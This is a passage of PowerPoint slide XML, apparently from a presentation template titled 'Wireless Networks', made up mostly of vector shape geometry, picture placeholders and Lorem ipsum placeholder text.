                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3" y="212"/>
                  <a:pt x="3" y="212"/>
                  <a:pt x="3" y="212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="152"/>
                  <a:pt x="63" y="152"/>
                  <a:pt x="63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37" y="152"/>
                  <a:pt x="32" y="147"/>
                  <a:pt x="32" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="133"/>
                  <a:pt x="37" y="128"/>
                  <a:pt x="44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88"/>
                  <a:pt x="104" y="188"/>
                  <a:pt x="104" y="188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="195"/>
                  <a:pt x="99" y="200"/>
                  <a:pt x="92" y="200"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="92" y="104"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="104"/>
                  <a:pt x="44" y="104"/>
                  <a:pt x="44" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="104"/>
                  <a:pt x="32" y="99"/>
                  <a:pt x="32" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="85"/>
                  <a:pt x="37" y="80"/>
                  <a:pt x="44" y="80"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="80"/>
                  <a:pt x="63" y="80"/>
                  <a:pt x="63" y="8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80" y="63"/>
                  <a:pt x="80" y="63"/>
                  <a:pt x="80" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="44"/>
                  <a:pt x="80" y="44"/>
                  <a:pt x="80" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="37"/>
                  <a:pt x="85" y="32"/>
                  <a:pt x="92" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99" y="32"/>
                  <a:pt x="104" y="37"/>
                  <a:pt x="104" y="44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40" name="Freeform 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D289662D-8A48-47C7-8056-B71BF806C88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882236" y="5121140"/>
            <a:ext cx="263524" cy="249464"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 27371 w 58"/>
              <a:gd name="T1" fmla="*/ 34102 h 54"/>
              <a:gd name="T2" fmla="*/ 0 w 58"/>
              <a:gd name="T3" fmla="*/ 34102 h 54"/>
              <a:gd name="T4" fmla="*/ 0 w 58"/>
              <a:gd name="T5" fmla="*/ 17051 h 54"/>
              <a:gd name="T6" fmla="*/ 27371 w 58"/>
              <a:gd name="T7" fmla="*/ 17051 h 54"/>
              <a:gd name="T8" fmla="*/ 27371 w 58"/>
              <a:gd name="T9" fmla="*/ 34102 h 54"/>
              <a:gd name="T10" fmla="*/ 112904 w 58"/>
              <a:gd name="T11" fmla="*/ 102306 h 54"/>
              <a:gd name="T12" fmla="*/ 0 w 58"/>
              <a:gd name="T13" fmla="*/ 102306 h 54"/>
              <a:gd name="T14" fmla="*/ 0 w 58"/>
              <a:gd name="T15" fmla="*/ 85255 h 54"/>
              <a:gd name="T16" fmla="*/ 112904 w 58"/>
              <a:gd name="T17" fmla="*/ 85255 h 54"/>
              <a:gd name="T18" fmla="*/ 112904 w 58"/>
              <a:gd name="T19" fmla="*/ 102306 h 54"/>
              <a:gd name="T20" fmla="*/ 44477 w 58"/>
              <a:gd name="T21" fmla="*/ 167099 h 54"/>
              <a:gd name="T22" fmla="*/ 0 w 58"/>
              <a:gd name="T23" fmla="*/ 167099 h 54"/>
              <a:gd name="T24" fmla="*/ 0 w 58"/>
              <a:gd name="T25" fmla="*/ 150048 h 54"/>
              <a:gd name="T26" fmla="*/ 44477 w 58"/>
              <a:gd name="T27" fmla="*/ 150048 h 54"/>
              <a:gd name="T28" fmla="*/ 44477 w 58"/>
              <a:gd name="T29" fmla="*/ 167099 h 54"/>
              <a:gd name="T30" fmla="*/ 82112 w 58"/>
              <a:gd name="T31" fmla="*/ 10231 h 54"/>
              <a:gd name="T32" fmla="*/ 82112 w 58"/>
              <a:gd name="T33" fmla="*/ 44332 h 54"/>
              <a:gd name="T34" fmla="*/ 75270 w 58"/>
              <a:gd name="T35" fmla="*/ 51153 h 54"/>
              <a:gd name="T36" fmla="*/ 41056 w 58"/>
              <a:gd name="T37" fmla="*/ 51153 h 54"/>
              <a:gd name="T38" fmla="*/ 30792 w 58"/>
              <a:gd name="T39" fmla="*/ 44332 h 54"/>
              <a:gd name="T40" fmla="*/ 30792 w 58"/>
              <a:gd name="T41" fmla="*/ 10231 h 54"/>
              <a:gd name="T42" fmla="*/ 41056 w 58"/>
              <a:gd name="T43" fmla="*/ 0 h 54"/>
              <a:gd name="T44" fmla="*/ 75270 w 58"/>
              <a:gd name="T45" fmla="*/ 0 h 54"/>
              <a:gd name="T46" fmla="*/ 82112 w 58"/>
              <a:gd name="T47" fmla="*/ 10231 h 54"/>
              <a:gd name="T48" fmla="*/ 99219 w 58"/>
              <a:gd name="T49" fmla="*/ 143228 h 54"/>
              <a:gd name="T50" fmla="*/ 99219 w 58"/>
              <a:gd name="T51" fmla="*/ 173919 h 54"/>
              <a:gd name="T52" fmla="*/ 88955 w 58"/>
              <a:gd name="T53" fmla="*/ 184150 h 54"/>
              <a:gd name="T54" fmla="*/ 58163 w 58"/>
              <a:gd name="T55" fmla="*/ 184150 h 54"/>
              <a:gd name="T56" fmla="*/ 47899 w 58"/>
              <a:gd name="T57" fmla="*/ 173919 h 54"/>
              <a:gd name="T58" fmla="*/ 47899 w 58"/>
              <a:gd name="T59" fmla="*/ 143228 h 54"/>
              <a:gd name="T60" fmla="*/ 58163 w 58"/>
              <a:gd name="T61" fmla="*/ 132997 h 54"/>
              <a:gd name="T62" fmla="*/ 88955 w 58"/>
              <a:gd name="T63" fmla="*/ 132997 h 54"/>
              <a:gd name="T64" fmla="*/ 99219 w 58"/>
              <a:gd name="T65" fmla="*/ 143228 h 54"/>
              <a:gd name="T66" fmla="*/ 198438 w 58"/>
              <a:gd name="T67" fmla="*/ 34102 h 54"/>
              <a:gd name="T68" fmla="*/ 85534 w 58"/>
              <a:gd name="T69" fmla="*/ 34102 h 54"/>
              <a:gd name="T70" fmla="*/ 85534 w 58"/>
              <a:gd name="T71" fmla="*/ 17051 h 54"/>
              <a:gd name="T72" fmla="*/ 198438 w 58"/>
              <a:gd name="T73" fmla="*/ 17051 h 54"/>
              <a:gd name="T74" fmla="*/ 198438 w 58"/>
              <a:gd name="T75" fmla="*/ 34102 h 54"/>
              <a:gd name="T76" fmla="*/ 198438 w 58"/>
              <a:gd name="T77" fmla="*/ 167099 h 54"/>
              <a:gd name="T78" fmla="*/ 102640 w 58"/>
              <a:gd name="T79" fmla="*/ 167099 h 54"/>
              <a:gd name="T80" fmla="*/ 102640 w 58"/>
              <a:gd name="T81" fmla="*/ 150048 h 54"/>
              <a:gd name="T82" fmla="*/ 198438 w 58"/>
              <a:gd name="T83" fmla="*/ 150048 h 54"/>
              <a:gd name="T84" fmla="*/ 198438 w 58"/>
              <a:gd name="T85" fmla="*/ 167099 h 54"/>
              <a:gd name="T86" fmla="*/ 164225 w 58"/>
              <a:gd name="T87" fmla="*/ 75024 h 54"/>
              <a:gd name="T88" fmla="*/ 164225 w 58"/>
              <a:gd name="T89" fmla="*/ 109126 h 54"/>
              <a:gd name="T90" fmla="*/ 157382 w 58"/>
              <a:gd name="T91" fmla="*/ 115946 h 54"/>
              <a:gd name="T92" fmla="*/ 123168 w 58"/>
              <a:gd name="T93" fmla="*/ 115946 h 54"/>
              <a:gd name="T94" fmla="*/ 116326 w 58"/>
              <a:gd name="T95" fmla="*/ 109126 h 54"/>
              <a:gd name="T96" fmla="*/ 116326 w 58"/>
              <a:gd name="T97" fmla="*/ 75024 h 54"/>
              <a:gd name="T98" fmla="*/ 123168 w 58"/>
              <a:gd name="T99" fmla="*/ 68204 h 54"/>
              <a:gd name="T100" fmla="*/ 157382 w 58"/>
              <a:gd name="T101" fmla="*/ 68204 h 54"/>
              <a:gd name="T102" fmla="*/ 164225 w 58"/>
              <a:gd name="T103" fmla="*/ 75024 h 54"/>
              <a:gd name="T104" fmla="*/ 198438 w 58"/>
              <a:gd name="T105" fmla="*/ 102306 h 54"/>
              <a:gd name="T106" fmla="*/ 171067 w 58"/>
              <a:gd name="T107" fmla="*/ 102306 h 54"/>
              <a:gd name="T108" fmla="*/ 171067 w 58"/>
              <a:gd name="T109" fmla="*/ 85255 h 54"/>
              <a:gd name="T110" fmla="*/ 198438 w 58"/>
              <a:gd name="T111" fmla="*/ 85255 h 54"/>
              <a:gd name="T112" fmla="*/ 198438 w 58"/>
              <a:gd name="T113" fmla="*/ 102306 h 54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58" h="54">
                <a:moveTo>
                  <a:pt x="8" y="10"/>
                </a:move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0" y="5"/>
                  <a:pt x="0" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="5"/>
                  <a:pt x="8" y="5"/>
                  <a:pt x="8" y="5"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8" y="10"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="33" y="30"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="30"/>
                  <a:pt x="0" y="30"/>
                  <a:pt x="0" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="25"/>
                  <a:pt x="0" y="25"/>
                  <a:pt x="0" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="25"/>
                  <a:pt x="33" y="25"/>
                  <a:pt x="33" y="25"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33" y="30"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13" y="49"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="49"/>
                  <a:pt x="0" y="49"/>
                  <a:pt x="0" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="44"/>
                  <a:pt x="0" y="44"/>
                  <a:pt x="0" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="44"/>
                  <a:pt x="13" y="44"/>
                  <a:pt x="13" y="44"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13" y="49"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="24" y="3"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="13"/>
                  <a:pt x="24" y="13"/>
                  <a:pt x="24" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="14"/>
                  <a:pt x="23" y="15"/>
                  <a:pt x="2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1" y="15"/>
                  <a:pt x="9" y="14"/>
                  <a:pt x="9" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="3"/>
                  <a:pt x="9" y="3"/>
                  <a:pt x="9" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="2"/>
                  <a:pt x="11" y="0"/>
                  <a:pt x="12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2"/>
                  <a:pt x="24" y="3"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="29" y="42"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="51"/>
                  <a:pt x="29" y="51"/>
                  <a:pt x="29" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="53"/>
                  <a:pt x="28" y="54"/>
                  <a:pt x="26" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17" y="54"/>
                  <a:pt x="17" y="54"/>
                  <a:pt x="17" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="54"/>
                  <a:pt x="14" y="53"/>
                  <a:pt x="14" y="51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0"/>
                  <a:pt x="15" y="39"/>
                  <a:pt x="17" y="39"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="39"/>
                  <a:pt x="26" y="39"/>
                  <a:pt x="26" y="39"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="39"/>
                  <a:pt x="29" y="40"/>
                  <a:pt x="29" y="42"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58" y="10"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="10"/>
                  <a:pt x="25" y="10"/>
                  <a:pt x="25" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="5"/>
                  <a:pt x="25" y="5"/>
                  <a:pt x="25" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="5"/>
                  <a:pt x="58" y="5"/>
                  <a:pt x="58" y="5"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58" y="10"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58" y="49"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="49"/>
                  <a:pt x="30" y="49"/>
                  <a:pt x="30" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="44"/>
                  <a:pt x="30" y="44"/>
                  <a:pt x="30" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="44"/>
                  <a:pt x="58" y="44"/>
                  <a:pt x="58" y="44"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58" y="49"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="48" y="22"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="32"/>
                  <a:pt x="48" y="32"/>
                  <a:pt x="48" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="33"/>
                  <a:pt x="47" y="34"/>
                  <a:pt x="4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5" y="34"/>
                  <a:pt x="34" y="33"/>
                  <a:pt x="34" y="3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1"/>
                  <a:pt x="35" y="20"/>
                  <a:pt x="36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47" y="20"/>
                  <a:pt x="48" y="21"/>
                  <a:pt x="48" y="22"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58" y="30"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="30"/>
                  <a:pt x="50" y="30"/>
                  <a:pt x="50" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="25"/>
                  <a:pt x="50" y="25"/>
                  <a:pt x="50" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="25"/>
                  <a:pt x="58" y="25"/>
                  <a:pt x="58" y="25"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58" y="3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88802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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269969" y="3061115"/>
            <a:ext cx="2508065" cy="16195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sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
              </a:rPr>
              <a:t>Lorem ipsum dolor sit amet, consectetur adipiscing alo elit. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
              </a:rPr>
              <a:t>Donec fringilla erat malesuada ante tristique ullamcorper. In vulputate neque.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture Placeholder 11"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="19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037" r="40037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4763" y="0"/>
            <a:ext cx="3048000" cy="6561932"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Rectangle 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4921" y="270782"/>
            <a:ext cx="8780211" cy="1210236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC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457200"/>
            <a:endParaRPr lang="en-US" sz="900" kern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86" name="TextBox 85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469914" y="521957"/>
            <a:ext cx="4909036" cy="707886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4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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Wireless Networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Полилиния 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD814BCA-D698-4838-B0EA-7741C7BF6661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="4873828" y="2754059"/>
            <a:ext cx="731727" cy="731733"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 49624 w 1216361"/>
              <a:gd name="connsiteY0" fmla="*/ 49631 h 1216369"/>
              <a:gd name="connsiteX1" fmla="*/ 168939 w 1216361"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1216369"/>
              <a:gd name="connsiteX2" fmla="*/ 1047421 w 1216361"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1216369"/>
              <a:gd name="connsiteX3" fmla="*/ 1166729 w 1216361"/>
              <a:gd name="connsiteY3" fmla="*/ 49633 h 1216369"/>
              <a:gd name="connsiteX4" fmla="*/ 1216361 w 1216361"/>
              <a:gd name="connsiteY4" fmla="*/ 168947 h 1216369"/>
              <a:gd name="connsiteX5" fmla="*/ 1216361 w 1216361"/>
              <a:gd name="connsiteY5" fmla="*/ 1047430 h 1216369"/>
              <a:gd name="connsiteX6" fmla="*/ 1166731 w 1216361"/>
              <a:gd name="connsiteY6" fmla="*/ 1166738 h 1216369"/>
              <a:gd name="connsiteX7" fmla="*/ 1047421 w 1216361"/>
              <a:gd name="connsiteY7" fmla="*/ 1216369 h 1216369"/>
              <a:gd name="connsiteX8" fmla="*/ 168939 w 1216361"/>
              <a:gd name="connsiteY8" fmla="*/ 1216369 h 1216369"/>
              <a:gd name="connsiteX9" fmla="*/ 49624 w 1216361"/>
              <a:gd name="connsiteY9" fmla="*/ 1166738 h 1216369"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 1216361"/>
              <a:gd name="connsiteY10" fmla="*/ 1047430 h 1216369"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1216361"/>
              <a:gd name="connsiteY11" fmla="*/ 168947 h 1216369"/>
              <a:gd name="connsiteX12" fmla="*/ 49624 w 1216361"/>
              <a:gd name="connsiteY12" fmla="*/ 49631 h 1216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216361" h="1216369">
                <a:moveTo>
                  <a:pt x="49624" y="49631"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="81478" y="17777"/>
                  <a:pt x="121245" y="1233"/>
                  <a:pt x="168939" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1047421" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1095109" y="1232"/>
                  <a:pt x="1134883" y="17777"/>
                  <a:pt x="1166729" y="49633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1198584" y="81486"/>
                  <a:pt x="1215127" y="121253"/>
                  <a:pt x="1216361" y="168947"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1216361" y="1047430"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1215129" y="1095116"/>
                  <a:pt x="1198584" y="1134890"/>
                  <a:pt x="1166731" y="1166738"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1134883" y="1198592"/>
                  <a:pt x="1095109" y="1215136"/>
                  <a:pt x="1047421" y="1216369"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168939" y="1216369"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121245" y="1215137"/>
                  <a:pt x="81479" y="1198592"/>
                  <a:pt x="49624" y="1166738"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17770" y="1134890"/>
                  <a:pt x="1226" y="1095116"/>
                  <a:pt x="0" y="1047430"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="168947"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1224" y="121253"/>
                  <a:pt x="17769" y="81486"/>
                  <a:pt x="49624" y="4963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609539" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="1200">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Полилиния 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992C3469-9E6F-4747-8CC7-011BD8747E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="9284677" y="2754059"/>
            <a:ext cx="731727" cy="731733"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 49624 w 1216361"/>
              <a:gd name="connsiteY0" fmla="*/ 49631 h 1216369"/>
              <a:gd name="connsiteX1" fmla="*/ 168939 w 1216361"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1216369"/>
              <a:gd name="connsiteX2" fmla="*/ 1047421 w 1216361"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1216369"/>
              <a:gd name="connsiteX3" fmla="*/ 1166729 w 1216361"/>
              <a:gd name="connsiteY3" fmla="*/ 49633 h 1216369"/>
              <a:gd name="connsiteX4" fmla="*/ 1216361 w 1216361"/>
              <a:gd name="connsiteY4" fmla="*/ 168947 h 1216369"/>
              <a:gd name="connsiteX5" fmla="*/ 1216361 w 1216361"/>
              <a:gd name="connsiteY5" fmla="*/ 1047430 h 1216369"/>
              <a:gd name="connsiteX6" fmla="*/ 1166731 w 1216361"/>
              <a:gd name="connsiteY6" fmla="*/ 1166738 h 1216369"/>
              <a:gd name="connsiteX7" fmla="*/ 1047421 w 1216361"/>
              <a:gd name="connsiteY7" fmla="*/ 1216369 h 1216369"/>
              <a:gd name="connsiteX8" fmla="*/ 168939 w 1216361"/>
              <a:gd name="connsiteY8" fmla="*/ 1216369 h 1216369"/>
              <a:gd name="connsiteX9" fmla="*/ 49624 w 1216361"/>
              <a:gd name="connsiteY9" fmla="*/ 1166738 h 1216369"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 1216361"/>
              <a:gd name="connsiteY10" fmla="*/ 1047430 h 1216369"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1216361"/>
              <a:gd name="connsiteY11" fmla="*/ 168947 h 1216369"/>
              <a:gd name="connsiteX12" fmla="*/ 49624 w 1216361"/>
              <a:gd name="connsiteY12" fmla="*/ 49631 h 1216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216361" h="1216369">
                <a:moveTo>
                  <a:pt x="49624" y="49631"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="81478" y="17777"/>
                  <a:pt x="121245" y="1233"/>
                  <a:pt x="168939" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1047421" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1095109" y="1232"/>
                  <a:pt x="1134883" y="17777"/>
                  <a:pt x="1166729" y="49633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1198584" y="81486"/>
                  <a:pt x="1215127" y="121253"/>
                  <a:pt x="1216361" y="168947"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1216361" y="1047430"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1215129" y="1095116"/>
                  <a:pt x="1198584" y="1134890"/>
                  <a:pt x="1166731" y="1166738"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1134883" y="1198592"/>
                  <a:pt x="1095109" y="1215136"/>
                  <a:pt x="1047421" y="1216369"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168939" y="1216369"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121245" y="1215137"/>
                  <a:pt x="81479" y="1198592"/>
                  <a:pt x="49624" y="1166738"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17770" y="1134890"/>
                  <a:pt x="1226" y="1095116"/>
                  <a:pt x="0" y="1047430"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="168947"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1224" y="121253"/>
                  <a:pt x="17769" y="81486"/>
                  <a:pt x="49624" y="4963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609539" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="1200">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture Placeholder 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D681D0D-3FD7-403E-B0D5-08B03275BEAD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093" r="24093"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089400" y="1970088"/>
            <a:ext cx="2300288" cy="2298700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY0" fmla="*/ 934788 h 3449403"/>
              <a:gd name="connsiteX1" fmla="*/ 1605245 w 3449405"/>
              <a:gd name="connsiteY1" fmla="*/ 984069 h 3449403"/>
              <a:gd name="connsiteX2" fmla="*/ 984064 w 3449405"/>
              <a:gd name="connsiteY2" fmla="*/ 1605250 h 3449403"/>
              <a:gd name="connsiteX3" fmla="*/ 934790 w 3449405"/>
              <a:gd name="connsiteY3" fmla="*/ 1724703 h 3449403"/>
              <a:gd name="connsiteX4" fmla="*/ 984064 w 3449405"/>
              <a:gd name="connsiteY4" fmla="*/ 1844166 h 3449403"/>
              <a:gd name="connsiteX5" fmla="*/ 1605244 w 3449405"/>
              <a:gd name="connsiteY5" fmla="*/ 2465346 h 3449403"/>
              <a:gd name="connsiteX6" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY6" fmla="*/ 2514617 h 3449403"/>
              <a:gd name="connsiteX7" fmla="*/ 1844162 w 3449405"/>
              <a:gd name="connsiteY7" fmla="*/ 2465347 h 3449403"/>
              <a:gd name="connsiteX8" fmla="*/ 2465343 w 3449405"/>
              <a:gd name="connsiteY8" fmla="*/ 1844166 h 3449403"/>
              <a:gd name="connsiteX9" fmla="*/ 2514616 w 3449405"/>
              <a:gd name="connsiteY9" fmla="*/ 1724703 h 3449403"/>
              <a:gd name="connsiteX10" fmla="*/ 2465348 w 3449405"/>
              <a:gd name="connsiteY10" fmla="*/ 1605244 h 3449403"/>
              <a:gd name="connsiteX11" fmla="*/ 1844168 w 3449405"/>
              <a:gd name="connsiteY11" fmla="*/ 984063 h 3449403"/>
              <a:gd name="connsiteX12" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY12" fmla="*/ 934788 h 3449403"/>
              <a:gd name="connsiteX13" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 3449403"/>
              <a:gd name="connsiteX14" fmla="*/ 1868439 w 3449405"/>
              <a:gd name="connsiteY14" fmla="*/ 18432 h 3449403"/>
